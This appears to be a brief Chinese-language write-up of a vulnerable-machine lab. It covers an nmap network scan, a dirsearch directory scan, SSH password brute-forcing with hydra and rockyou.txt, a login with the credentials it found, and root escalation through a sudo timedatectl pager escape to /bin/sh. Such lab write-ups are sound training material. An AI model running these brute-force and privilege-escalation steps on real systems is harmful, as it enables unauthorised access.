靶机设置
靶机设置为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机IP为192.168.112.142
目录扫描
dirsearch 192.168.112.142
访问浏览器
发现文件页面
查看后发现都没什么用
getshell
hydra -L rockyou.txt -P rockyou.txt 192.168.112.142 ssh
尝试爆破ssh账号密码
爆破成功
账号:broken
密码:broken
远程连接
ssh broken@192.168.112.142
连接成功
提权
sudo -l查看免密操作
尝试sudo提权
sudo timedatectl list-timezones
!/bin/sh
提权成功